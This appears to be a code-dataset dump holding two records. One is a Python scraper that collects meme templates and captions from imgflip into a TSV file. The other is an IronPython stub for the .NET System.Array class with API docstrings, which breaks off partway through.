2021-06-18T20:02:55.000Z
|
data/scraper.py
|
hmartelb/meme-search
|
2042678b3a7252ba00699e7a0618aafdf2059465
|
[
"MIT"
] | null | null | null |
data/scraper.py
|
hmartelb/meme-search
|
2042678b3a7252ba00699e7a0618aafdf2059465
|
[
"MIT"
] | null | null | null |
import json
import time
import os
import pandas as pd
import requests
from bs4 import BeautifulSoup
from tqdm import tqdm
def process_9gag(args):
fetched_memes = []
errors = 0
# for i in tqdm(range(args.))
pass
def process_me_dot_me(args):
pass
def templates_imgflip(args):
args.source_url = "https://imgflip.com/memetemplates"
fetched_templates = []
errors = 0
for i in tqdm(range(args.from_page, args.pages + 1)):
print(f"Requesting: {args.source_url}?page={i}")
response = requests.get(f"{args.source_url}?page={i}")
print(response)
if response.status_code != 200:
print("Bad response")
break
body = BeautifulSoup(response.text, 'html.parser')
templates = body.findAll("div", {"class": "mt-box"})
print(len(templates))
for template in templates:
try:
template_url = "https://"+template.find('img', {"class": "shadow"})['src'][2:]
template_id, template_format = os.path.splitext(template_url.split("/")[-1])
template_title = template.find("h3", {"class": "mt-title"}).find("a")
template_title = "" if template_title is None else template_title.text
template_data = {
"id": template_id,
"format": template_format,
"website": "imgflip",
"url": template_url,
"title": template_title
}
fetched_templates.append(template_data)
except:
errors += 1
# time.sleep(args.delay)
print(f"Fetched: {len(fetched_templates)} templates. Found {errors} error(s).")
return fetched_templates
def process_imgflip(args):
'''
https://gist.github.com/WalterSimoncini/defca6de456bb168ada303085358bf0a
'''
fetched_memes = []
errors = 0
for i in tqdm(range(args.from_page, args.pages + 1)):
# print(f"Processing page {i}")
response = requests.get(f"{args.source_url}?page={i}")
body = BeautifulSoup(response.text, 'html.parser')
if response.status_code != 200:
# print("Something went wrong!")
break # Something went wrong (e.g. page limit)
memes = body.findAll("div", {"class": "base-unit clearfix"})
for meme in memes:
if "not-safe-for-work images" in str(meme):
continue # NSFW memes are available only to logged in users
try:
meme_url = 'https://'+meme.find("img", {"class": "base-img"})["src"][2:]
meme_id, meme_format = os.path.splitext(meme_url.split("/")[-1])
# Handle anonymous authors
meme_author = meme.find("a", {"class": "u-username"})
meme_author = "anonymous" if meme_author is None else meme_author.text
# Handle empty titles
meme_title = meme.find("h2", {"class": "base-unit-title"}).find("a")
meme_title = "" if meme_title is None else meme_title.text
meme_text = meme.find("img", {"class": "base-img"})["alt"]
meme_text = meme_text.split("|")[1].strip()
meme_data = {
"id": meme_id,
"format": meme_format,
"website": "imgflip",
"url": meme_url,
"author": meme_author,
"title": meme_title,
"text": meme_text.lower()
}
fetched_memes.append(meme_data)
except:
errors += 1
time.sleep(args.delay)
print(f"Fetched: {len(fetched_memes)} memes. Found {errors} error(s).")
return fetched_memes
if __name__ == '__main__':
import argparse
ap = argparse.ArgumentParser()
# ap.add_argument("--source_url", default="https://imgflip.com/tag/programming", help="Memes list url (e.g. https://imgflip.com/meme/Bird-Box)", type=str)
ap.add_argument("--tag", required=True, type=str)#default=['programming', 'artificial intelligence', 'computer'], type=list)
ap.add_argument("--from_page", default=1, help="Initial page", type=int)
ap.add_argument("--pages", default=44, help="Maximum page number to be scraped", type=int)
ap.add_argument("--delay", default=2, help="Delay between page loads (seconds)", type=int)
ap.add_argument("-o", "--output", default="templates.tsv")
args = ap.parse_args()
# category = args.source_url.split("/")[-1].replace("-", " ")
# Get the data
data = {}
# for tag in args.tags:
print(f"Processing tag: {args.tag}")
# Get the data
# args.source_url = f"https://imgflip.com/tag/{args.tag.replace(' ', '+')}"
# data = process_imgflip(args)
# args.source_url = f"https://ww.9gag.com/search/?query={args.tag.replace(' ', '+')}"
# data = process_9gag(args)
data = templates_imgflip(args)
# Create a pd.DataFrame and save (append to existing .tsv)
df = pd.DataFrame(data)
print(df.head(20))
df.to_csv(args.output, sep='\t', index=False, mode='a')
| 36.09589
| 158
| 0.563567
|
import json
import time
import os
import pandas as pd
import requests
from bs4 import BeautifulSoup
from tqdm import tqdm
def process_9gag(args):
fetched_memes = []
errors = 0
pass
def process_me_dot_me(args):
pass
def templates_imgflip(args):
args.source_url = "https://imgflip.com/memetemplates"
fetched_templates = []
errors = 0
for i in tqdm(range(args.from_page, args.pages + 1)):
print(f"Requesting: {args.source_url}?page={i}")
response = requests.get(f"{args.source_url}?page={i}")
print(response)
if response.status_code != 200:
print("Bad response")
break
body = BeautifulSoup(response.text, 'html.parser')
templates = body.findAll("div", {"class": "mt-box"})
print(len(templates))
for template in templates:
try:
template_url = "https://"+template.find('img', {"class": "shadow"})['src'][2:]
template_id, template_format = os.path.splitext(template_url.split("/")[-1])
template_title = template.find("h3", {"class": "mt-title"}).find("a")
template_title = "" if template_title is None else template_title.text
template_data = {
"id": template_id,
"format": template_format,
"website": "imgflip",
"url": template_url,
"title": template_title
}
fetched_templates.append(template_data)
except:
errors += 1
print(f"Fetched: {len(fetched_templates)} templates. Found {errors} error(s).")
return fetched_templates
def process_imgflip(args):
fetched_memes = []
errors = 0
for i in tqdm(range(args.from_page, args.pages + 1)):
response = requests.get(f"{args.source_url}?page={i}")
body = BeautifulSoup(response.text, 'html.parser')
if response.status_code != 200:
break
memes = body.findAll("div", {"class": "base-unit clearfix"})
for meme in memes:
if "not-safe-for-work images" in str(meme):
continue
try:
meme_url = 'https://'+meme.find("img", {"class": "base-img"})["src"][2:]
meme_id, meme_format = os.path.splitext(meme_url.split("/")[-1])
meme_author = meme.find("a", {"class": "u-username"})
meme_author = "anonymous" if meme_author is None else meme_author.text
meme_title = meme.find("h2", {"class": "base-unit-title"}).find("a")
meme_title = "" if meme_title is None else meme_title.text
meme_text = meme.find("img", {"class": "base-img"})["alt"]
meme_text = meme_text.split("|")[1].strip()
meme_data = {
"id": meme_id,
"format": meme_format,
"website": "imgflip",
"url": meme_url,
"author": meme_author,
"title": meme_title,
"text": meme_text.lower()
}
fetched_memes.append(meme_data)
except:
errors += 1
time.sleep(args.delay)
print(f"Fetched: {len(fetched_memes)} memes. Found {errors} error(s).")
return fetched_memes
if __name__ == '__main__':
import argparse
ap = argparse.ArgumentParser()
ap.add_argument("--tag", required=True, type=str)
ap.add_argument("--from_page", default=1, help="Initial page", type=int)
ap.add_argument("--pages", default=44, help="Maximum page number to be scraped", type=int)
ap.add_argument("--delay", default=2, help="Delay between page loads (seconds)", type=int)
ap.add_argument("-o", "--output", default="templates.tsv")
args = ap.parse_args()
data = {}
print(f"Processing tag: {args.tag}")
data = templates_imgflip(args)
df = pd.DataFrame(data)
print(df.head(20))
df.to_csv(args.output, sep='\t', index=False, mode='a')
| true
| true
|
f70b78cf3d193ad5a49b7e2c944da33196938d26
| 39,984
|
py
|
Python
|
stubs.min/System/__init___parts/Array.py
|
ricardyn/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | 1
|
2021-02-02T13:39:16.000Z
|
2021-02-02T13:39:16.000Z
|
stubs.min/System/__init___parts/Array.py
|
hdm-dt-fb/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | null | null | null |
stubs.min/System/__init___parts/Array.py
|
hdm-dt-fb/ironpython-stubs
|
4d2b405eda3ceed186e8adca55dd97c332c6f49d
|
[
"MIT"
] | null | null | null |
class Array(object,ICloneable,IList,ICollection,IEnumerable,IStructuralComparable,IStructuralEquatable):
""" Provides methods for creating,manipulating,searching,and sorting arrays,thereby serving as the base class for all arrays in the common language runtime. """
@staticmethod
def AsReadOnly(array):
""" AsReadOnly[T](array: Array[T]) -> ReadOnlyCollection[T] """
pass
@staticmethod
def BinarySearch(array,*__args):
"""
BinarySearch[T](array: Array[T],value: T,comparer: IComparer[T]) -> int
BinarySearch[T](array: Array[T],value: T) -> int
BinarySearch[T](array: Array[T],index: int,length: int,value: T,comparer: IComparer[T]) -> int
BinarySearch[T](array: Array[T],index: int,length: int,value: T) -> int
BinarySearch(array: Array,index: int,length: int,value: object) -> int
Searches a range of elements in a one-dimensional sorted System.Array for a
value,using the System.IComparable interface implemented by each element of
the System.Array and by the specified value.
array: The sorted one-dimensional System.Array to search.
index: The starting index of the range to search.
length: The length of the range to search.
value: The object to search for.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
BinarySearch(array: Array,value: object) -> int
Searches an entire one-dimensional sorted System.Array for a specific element,
using the System.IComparable interface implemented by each element of the
System.Array and by the specified object.
array: The sorted one-dimensional System.Array to search.
value: The object to search for.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
BinarySearch(array: Array,index: int,length: int,value: object,comparer: IComparer) -> int
Searches a range of elements in a one-dimensional sorted System.Array for a
value,using the specified System.Collections.IComparer interface.
array: The sorted one-dimensional System.Array to search.
index: The starting index of the range to search.
length: The length of the range to search.
value: The object to search for.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or- null to use the System.IComparable implementation of each
element.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
BinarySearch(array: Array,value: object,comparer: IComparer) -> int
Searches an entire one-dimensional sorted System.Array for a value using the
specified System.Collections.IComparer interface.
array: The sorted one-dimensional System.Array to search.
value: The object to search for.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or- null to use the System.IComparable implementation of each
element.
Returns: The index of the specified value in the specified array,if value is found. If
value is not found and value is less than one or more elements in array,a
negative number which is the bitwise complement of the index of the first
element that is larger than value. If value is not found and value is greater
than any of the elements in array,a negative number which is the bitwise
complement of (the index of the last element plus 1).
"""
pass
@staticmethod
def Clear(array,index,length):
"""
Clear(array: Array,index: int,length: int)
Sets a range of elements in the System.Array to zero,to false,or to null,
depending on the element type.
array: The System.Array whose elements need to be cleared.
index: The starting index of the range of elements to clear.
length: The number of elements to clear.
"""
pass
def Clone(self):
"""
Clone(self: Array) -> object
Creates a shallow copy of the System.Array.
Returns: A shallow copy of the System.Array.
"""
pass
@staticmethod
def ConstrainedCopy(sourceArray,sourceIndex,destinationArray,destinationIndex,length):
"""
ConstrainedCopy(sourceArray: Array,sourceIndex: int,destinationArray: Array,destinationIndex: int,length: int)
Copies a range of elements from an System.Array starting at the specified
source index and pastes them to another System.Array starting at the specified
destination index. Guarantees that all changes are undone if the copy does not
succeed completely.
sourceArray: The System.Array that contains the data to copy.
sourceIndex: A 32-bit integer that represents the index in the sourceArray at which copying
begins.
destinationArray: The System.Array that receives the data.
destinationIndex: A 32-bit integer that represents the index in the destinationArray at which
storing begins.
length: A 32-bit integer that represents the number of elements to copy.
"""
pass
@staticmethod
def ConvertAll(array,converter):
""" ConvertAll[(TInput,TOutput)](array: Array[TInput],converter: Converter[TInput,TOutput]) -> Array[TOutput] """
pass
@staticmethod
def Copy(sourceArray,*__args):
"""
Copy(sourceArray: Array,destinationArray: Array,length: Int64)
Copies a range of elements from an System.Array starting at the first element
and pastes them into another System.Array starting at the first element. The
length is specified as a 64-bit integer.
sourceArray: The System.Array that contains the data to copy.
destinationArray: The System.Array that receives the data.
length: A 64-bit integer that represents the number of elements to copy. The integer
must be between zero and System.Int32.MaxValue,inclusive.
Copy(sourceArray: Array,sourceIndex: Int64,destinationArray: Array,destinationIndex: Int64,length: Int64)
Copies a range of elements from an System.Array starting at the specified
source index and pastes them to another System.Array starting at the specified
destination index. The length and the indexes are specified as 64-bit integers.
sourceArray: The System.Array that contains the data to copy.
sourceIndex: A 64-bit integer that represents the index in the sourceArray at which copying
begins.
destinationArray: The System.Array that receives the data.
destinationIndex: A 64-bit integer that represents the index in the destinationArray at which
storing begins.
length: A 64-bit integer that represents the number of elements to copy. The integer
must be between zero and System.Int32.MaxValue,inclusive.
Copy(sourceArray: Array,destinationArray: Array,length: int)
Copies a range of elements from an System.Array starting at the first element
and pastes them into another System.Array starting at the first element. The
length is specified as a 32-bit integer.
sourceArray: The System.Array that contains the data to copy.
destinationArray: The System.Array that receives the data.
length: A 32-bit integer that represents the number of elements to copy.
Copy(sourceArray: Array,sourceIndex: int,destinationArray: Array,destinationIndex: int,length: int)
Copies a range of elements from an System.Array starting at the specified
source index and pastes them to another System.Array starting at the specified
destination index. The length and the indexes are specified as 32-bit integers.
sourceArray: The System.Array that contains the data to copy.
sourceIndex: A 32-bit integer that represents the index in the sourceArray at which copying
begins.
destinationArray: The System.Array that receives the data.
destinationIndex: A 32-bit integer that represents the index in the destinationArray at which
storing begins.
length: A 32-bit integer that represents the number of elements to copy.
"""
pass
def CopyTo(self,array,index):
"""
CopyTo(self: Array,array: Array,index: Int64)
Copies all the elements of the current one-dimensional System.Array to the
specified one-dimensional System.Array starting at the specified destination
System.Array index. The index is specified as a 64-bit integer.
array: The one-dimensional System.Array that is the destination of the elements copied
from the current System.Array.
index: A 64-bit integer that represents the index in array at which copying begins.
CopyTo(self: Array,array: Array,index: int)
Copies all the elements of the current one-dimensional System.Array to the
specified one-dimensional System.Array starting at the specified destination
System.Array index. The index is specified as a 32-bit integer.
array: The one-dimensional System.Array that is the destination of the elements copied
from the current System.Array.
index: A 32-bit integer that represents the index in array at which copying begins.
"""
pass
@staticmethod
def CreateInstance(elementType,*__args):
"""
CreateInstance(elementType: Type,*lengths: Array[int]) -> Array
Creates a multidimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing. The dimension lengths are
specified in an array of 32-bit integers.
elementType: The System.Type of the System.Array to create.
lengths: An array of 32-bit integers that represent the size of each dimension of the
System.Array to create.
Returns: A new multidimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
CreateInstance(elementType: Type,*lengths: Array[Int64]) -> Array
Creates a multidimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing. The dimension lengths are
specified in an array of 64-bit integers.
elementType: The System.Type of the System.Array to create.
lengths: An array of 64-bit integers that represent the size of each dimension of the
System.Array to create. Each integer in the array must be between zero and
System.Int32.MaxValue,inclusive.
Returns: A new multidimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
CreateInstance(elementType: Type,lengths: Array[int],lowerBounds: Array[int]) -> Array
Creates a multidimensional System.Array of the specified System.Type and
dimension lengths,with the specified lower bounds.
elementType: The System.Type of the System.Array to create.
lengths: A one-dimensional array that contains the size of each dimension of the
System.Array to create.
lowerBounds: A one-dimensional array that contains the lower bound (starting index) of each
dimension of the System.Array to create.
Returns: A new multidimensional System.Array of the specified System.Type with the
specified length and lower bound for each dimension.
CreateInstance(elementType: Type,length: int) -> Array
Creates a one-dimensional System.Array of the specified System.Type and length,
with zero-based indexing.
elementType: The System.Type of the System.Array to create.
length: The size of the System.Array to create.
Returns: A new one-dimensional System.Array of the specified System.Type with the
specified length,using zero-based indexing.
CreateInstance(elementType: Type,length1: int,length2: int) -> Array
Creates a two-dimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing.
elementType: The System.Type of the System.Array to create.
length1: The size of the first dimension of the System.Array to create.
length2: The size of the second dimension of the System.Array to create.
Returns: A new two-dimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
CreateInstance(elementType: Type,length1: int,length2: int,length3: int) -> Array
Creates a three-dimensional System.Array of the specified System.Type and
dimension lengths,with zero-based indexing.
elementType: The System.Type of the System.Array to create.
length1: The size of the first dimension of the System.Array to create.
length2: The size of the second dimension of the System.Array to create.
length3: The size of the third dimension of the System.Array to create.
Returns: A new three-dimensional System.Array of the specified System.Type with the
specified length for each dimension,using zero-based indexing.
"""
pass
@staticmethod
def Empty():
""" Empty[T]() -> Array[T] """
pass
@staticmethod
def Exists(array,match):
""" Exists[T](array: Array[T],match: Predicate[T]) -> bool """
pass
@staticmethod
def Find(array,match):
""" Find[T](array: Array[T],match: Predicate[T]) -> T """
pass
@staticmethod
def FindAll(array,match):
""" FindAll[T](array: Array[T],match: Predicate[T]) -> Array[T] """
pass
@staticmethod
def FindIndex(array,*__args):
"""
FindIndex[T](array: Array[T],startIndex: int,count: int,match: Predicate[T]) -> int
FindIndex[T](array: Array[T],startIndex: int,match: Predicate[T]) -> int
FindIndex[T](array: Array[T],match: Predicate[T]) -> int
"""
pass
@staticmethod
def FindLast(array,match):
""" FindLast[T](array: Array[T],match: Predicate[T]) -> T """
pass
@staticmethod
def FindLastIndex(array,*__args):
"""
FindLastIndex[T](array: Array[T],startIndex: int,count: int,match: Predicate[T]) -> int
FindLastIndex[T](array: Array[T],startIndex: int,match: Predicate[T]) -> int
FindLastIndex[T](array: Array[T],match: Predicate[T]) -> int
"""
pass
@staticmethod
def ForEach(array,action):
""" ForEach[T](array: Array[T],action: Action[T]) """
pass
def GetEnumerator(self):
"""
GetEnumerator(self: Array) -> IEnumerator
Returns an System.Collections.IEnumerator for the System.Array.
Returns: An System.Collections.IEnumerator for the System.Array.
"""
pass
def GetLength(self,dimension):
"""
GetLength(self: Array,dimension: int) -> int
Gets a 32-bit integer that represents the number of elements in the specified
dimension of the System.Array.
dimension: A zero-based dimension of the System.Array whose length needs to be determined.
Returns: A 32-bit integer that represents the number of elements in the specified
dimension.
"""
pass
def GetLongLength(self,dimension):
"""
GetLongLength(self: Array,dimension: int) -> Int64
Gets a 64-bit integer that represents the number of elements in the specified
dimension of the System.Array.
dimension: A zero-based dimension of the System.Array whose length needs to be determined.
Returns: A 64-bit integer that represents the number of elements in the specified
dimension.
"""
pass
def GetLowerBound(self,dimension):
"""
GetLowerBound(self: Array,dimension: int) -> int
Gets the lower bound of the specified dimension in the System.Array.
dimension: A zero-based dimension of the System.Array whose lower bound needs to be
determined.
Returns: The lower bound of the specified dimension in the System.Array.
"""
pass
def GetUpperBound(self,dimension):
"""
GetUpperBound(self: Array,dimension: int) -> int
Gets the upper bound of the specified dimension in the System.Array.
dimension: A zero-based dimension of the System.Array whose upper bound needs to be
determined.
Returns: The upper bound of the specified dimension in the System.Array.
"""
pass
def GetValue(self,*__args):
"""
GetValue(self: Array,index1: Int64,index2: Int64) -> object
Gets the value at the specified position in the two-dimensional System.Array.
The indexes are specified as 64-bit integers.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the two-dimensional System.Array.
GetValue(self: Array,index: Int64) -> object
Gets the value at the specified position in the one-dimensional System.Array.
The index is specified as a 64-bit integer.
index: A 64-bit integer that represents the position of the System.Array element to
get.
Returns: The value at the specified position in the one-dimensional System.Array.
GetValue(self: Array,*indices: Array[Int64]) -> object
Gets the value at the specified position in the multidimensional System.Array.
The indexes are specified as an array of 64-bit integers.
indices: A one-dimensional array of 64-bit integers that represent the indexes
specifying the position of the System.Array element to get.
Returns: The value at the specified position in the multidimensional System.Array.
GetValue(self: Array,index1: Int64,index2: Int64,index3: Int64) -> object
Gets the value at the specified position in the three-dimensional System.Array.
The indexes are specified as 64-bit integers.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to get.
index3: A 64-bit integer that represents the third-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the three-dimensional System.Array.
GetValue(self: Array,index: int) -> object
Gets the value at the specified position in the one-dimensional System.Array.
The index is specified as a 32-bit integer.
index: A 32-bit integer that represents the position of the System.Array element to
get.
Returns: The value at the specified position in the one-dimensional System.Array.
GetValue(self: Array,*indices: Array[int]) -> object
Gets the value at the specified position in the multidimensional System.Array.
The indexes are specified as an array of 32-bit integers.
indices: A one-dimensional array of 32-bit integers that represent the indexes
specifying the position of the System.Array element to get.
Returns: The value at the specified position in the multidimensional System.Array.
GetValue(self: Array,index1: int,index2: int,index3: int) -> object
Gets the value at the specified position in the three-dimensional System.Array.
The indexes are specified as 32-bit integers.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to get.
index3: A 32-bit integer that represents the third-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the three-dimensional System.Array.
GetValue(self: Array,index1: int,index2: int) -> object
Gets the value at the specified position in the two-dimensional System.Array.
The indexes are specified as 32-bit integers.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to get.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to get.
Returns: The value at the specified position in the two-dimensional System.Array.
"""
pass
@staticmethod
def IndexOf(array,value,startIndex=None,count=None):
"""
IndexOf[T](array: Array[T],value: T) -> int
IndexOf[T](array: Array[T],value: T,startIndex: int) -> int
IndexOf[T](array: Array[T],value: T,startIndex: int,count: int) -> int
IndexOf(array: Array,value: object) -> int
Searches for the specified object and returns the index of the first occurrence
within the entire one-dimensional System.Array.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
Returns: The index of the first occurrence of value within the entire array,if found;
otherwise,the lower bound of the array minus 1.
IndexOf(array: Array,value: object,startIndex: int) -> int
Searches for the specified object and returns the index of the first occurrence
within the range of elements in the one-dimensional System.Array that extends
from the specified index to the last element.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the search. 0 (zero) is valid in an empty array.
Returns: The index of the first occurrence of value within the range of elements in
array that extends from startIndex to the last element,if found; otherwise,
the lower bound of the array minus 1.
IndexOf(array: Array,value: object,startIndex: int,count: int) -> int
Searches for the specified object and returns the index of the first occurrence
within the range of elements in the one-dimensional System.Array that starts at
the specified index and contains the specified number of elements.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the search. 0 (zero) is valid in an empty array.
count: The number of elements in the section to search.
Returns: The index of the first occurrence of value within the range of elements in
array that starts at startIndex and contains the number of elements specified
in count,if found; otherwise,the lower bound of the array minus 1.
"""
pass
def Initialize(self):
"""
Initialize(self: Array)
Initializes every element of the value-type System.Array by calling the default
constructor of the value type.
"""
pass
@staticmethod
def LastIndexOf(array,value,startIndex=None,count=None):
"""
LastIndexOf[T](array: Array[T],value: T) -> int
LastIndexOf[T](array: Array[T],value: T,startIndex: int) -> int
LastIndexOf[T](array: Array[T],value: T,startIndex: int,count: int) -> int
LastIndexOf(array: Array,value: object) -> int
Searches for the specified object and returns the index of the last occurrence
within the entire one-dimensional System.Array.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
Returns: The index of the last occurrence of value within the entire array,if found;
otherwise,the lower bound of the array minus 1.
LastIndexOf(array: Array,value: object,startIndex: int) -> int
Searches for the specified object and returns the index of the last occurrence
within the range of elements in the one-dimensional System.Array that extends
from the first element to the specified index.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the backward search.
Returns: The index of the last occurrence of value within the range of elements in array
that extends from the first element to startIndex,if found; otherwise,the
lower bound of the array minus 1.
LastIndexOf(array: Array,value: object,startIndex: int,count: int) -> int
Searches for the specified object and returns the index of the last occurrence
within the range of elements in the one-dimensional System.Array that contains
the specified number of elements and ends at the specified index.
array: The one-dimensional System.Array to search.
value: The object to locate in array.
startIndex: The starting index of the backward search.
count: The number of elements in the section to search.
Returns: The index of the last occurrence of value within the range of elements in array
that contains the number of elements specified in count and ends at startIndex,
if found; otherwise,the lower bound of the array minus 1.
"""
pass
@staticmethod
def Resize(array,newSize):
""" Resize[T](array: Array[T],newSize: int) -> Array[T] """
pass
@staticmethod
def Reverse(array,index=None,length=None):
"""
Reverse(array: Array,index: int,length: int)
Reverses the sequence of the elements in a range of elements in the
one-dimensional System.Array.
array: The one-dimensional System.Array to reverse.
index: The starting index of the section to reverse.
length: The number of elements in the section to reverse.
Reverse(array: Array)
Reverses the sequence of the elements in the entire one-dimensional
System.Array.
array: The one-dimensional System.Array to reverse.
"""
pass
def SetValue(self,value,*__args):
"""
SetValue(self: Array,value: object,index1: Int64,index2: Int64)
Sets a value to the element at the specified position in the two-dimensional
System.Array. The indexes are specified as 64-bit integers.
value: The new value for the specified element.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to set.
SetValue(self: Array,value: object,index: Int64)
Sets a value to the element at the specified position in the one-dimensional
System.Array. The index is specified as a 64-bit integer.
value: The new value for the specified element.
index: A 64-bit integer that represents the position of the System.Array element to
set.
SetValue(self: Array,value: object,*indices: Array[Int64])
Sets a value to the element at the specified position in the multidimensional
System.Array. The indexes are specified as an array of 64-bit integers.
value: The new value for the specified element.
indices: A one-dimensional array of 64-bit integers that represent the indexes
specifying the position of the element to set.
SetValue(self: Array,value: object,index1: Int64,index2: Int64,index3: Int64)
Sets a value to the element at the specified position in the three-dimensional
System.Array. The indexes are specified as 64-bit integers.
value: The new value for the specified element.
index1: A 64-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 64-bit integer that represents the second-dimension index of the System.Array
element to set.
index3: A 64-bit integer that represents the third-dimension index of the System.Array
element to set.
SetValue(self: Array,value: object,index1: int,index2: int)
Sets a value to the element at the specified position in the two-dimensional
System.Array. The indexes are specified as 32-bit integers.
value: The new value for the specified element.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to set.
SetValue(self: Array,value: object,index: int)
Sets a value to the element at the specified position in the one-dimensional
System.Array. The index is specified as a 32-bit integer.
value: The new value for the specified element.
index: A 32-bit integer that represents the position of the System.Array element to
set.
SetValue(self: Array,value: object,*indices: Array[int])
Sets a value to the element at the specified position in the multidimensional
System.Array. The indexes are specified as an array of 32-bit integers.
value: The new value for the specified element.
indices: A one-dimensional array of 32-bit integers that represent the indexes
specifying the position of the element to set.
SetValue(self: Array,value: object,index1: int,index2: int,index3: int)
Sets a value to the element at the specified position in the three-dimensional
System.Array. The indexes are specified as 32-bit integers.
value: The new value for the specified element.
index1: A 32-bit integer that represents the first-dimension index of the System.Array
element to set.
index2: A 32-bit integer that represents the second-dimension index of the System.Array
element to set.
index3: A 32-bit integer that represents the third-dimension index of the System.Array
element to set.
"""
pass
@staticmethod
def Sort(*__args):
"""
Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue],index: int,length: int)Sort[T](array: Array[T],comparer: IComparer[T])Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue])Sort[T](array: Array[T],index: int,length: int)Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue],index: int,length: int,comparer: IComparer[TKey])Sort[T](array: Array[T],comparison: Comparison[T])Sort[(TKey,TValue)](keys: Array[TKey],items: Array[TValue],comparer: IComparer[TKey])Sort[T](array: Array[T],index: int,length: int,comparer: IComparer[T])Sort[T](array: Array[T])Sort(array: Array,index: int,length: int)
Sorts the elements in a range of elements in a one-dimensional System.Array
using the System.IComparable implementation of each element of the
System.Array.
array: The one-dimensional System.Array to sort.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
Sort(keys: Array,items: Array,index: int,length: int)
Sorts a range of elements in a pair of one-dimensional System.Array objects
(one contains the keys and the other contains the corresponding items) based on
the keys in the first System.Array using the System.IComparable implementation
of each key.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
Sort(array: Array)
Sorts the elements in an entire one-dimensional System.Array using the
System.IComparable implementation of each element of the System.Array.
array: The one-dimensional System.Array to sort.
Sort(keys: Array,items: Array)
Sorts a pair of one-dimensional System.Array objects (one contains the keys and
the other contains the corresponding items) based on the keys in the first
System.Array using the System.IComparable implementation of each key.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
Sort(array: Array,index: int,length: int,comparer: IComparer)
Sorts the elements in a range of elements in a one-dimensional System.Array
using the specified System.Collections.IComparer.
array: The one-dimensional System.Array to sort.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
Sort(keys: Array,items: Array,index: int,length: int,comparer: IComparer)
Sorts a range of elements in a pair of one-dimensional System.Array objects
(one contains the keys and the other contains the corresponding items) based on
the keys in the first System.Array using the specified
System.Collections.IComparer.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
index: The starting index of the range to sort.
length: The number of elements in the range to sort.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
Sort(array: Array,comparer: IComparer)
Sorts the elements in a one-dimensional System.Array using the specified
System.Collections.IComparer.
array: The one-dimensional System.Array to sort.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
Sort(keys: Array,items: Array,comparer: IComparer)
Sorts a pair of one-dimensional System.Array objects (one contains the keys and
the other contains the corresponding items) based on the keys in the first
System.Array using the specified System.Collections.IComparer.
keys: The one-dimensional System.Array that contains the keys to sort.
items: The one-dimensional System.Array that contains the items that correspond to
each of the keys in the keysSystem.Array.-or-null to sort only the
keysSystem.Array.
comparer: The System.Collections.IComparer implementation to use when comparing
elements.-or-null to use the System.IComparable implementation of each element.
"""
pass
@staticmethod
def TrueForAll(array,match):
""" TrueForAll[T](array: Array[T],match: Predicate[T]) -> bool """
pass
def __add__(self,*args):
""" x.__add__(y) <==> x+y """
pass
def __contains__(self,*args):
"""
__contains__(self: IList,value: object) -> bool
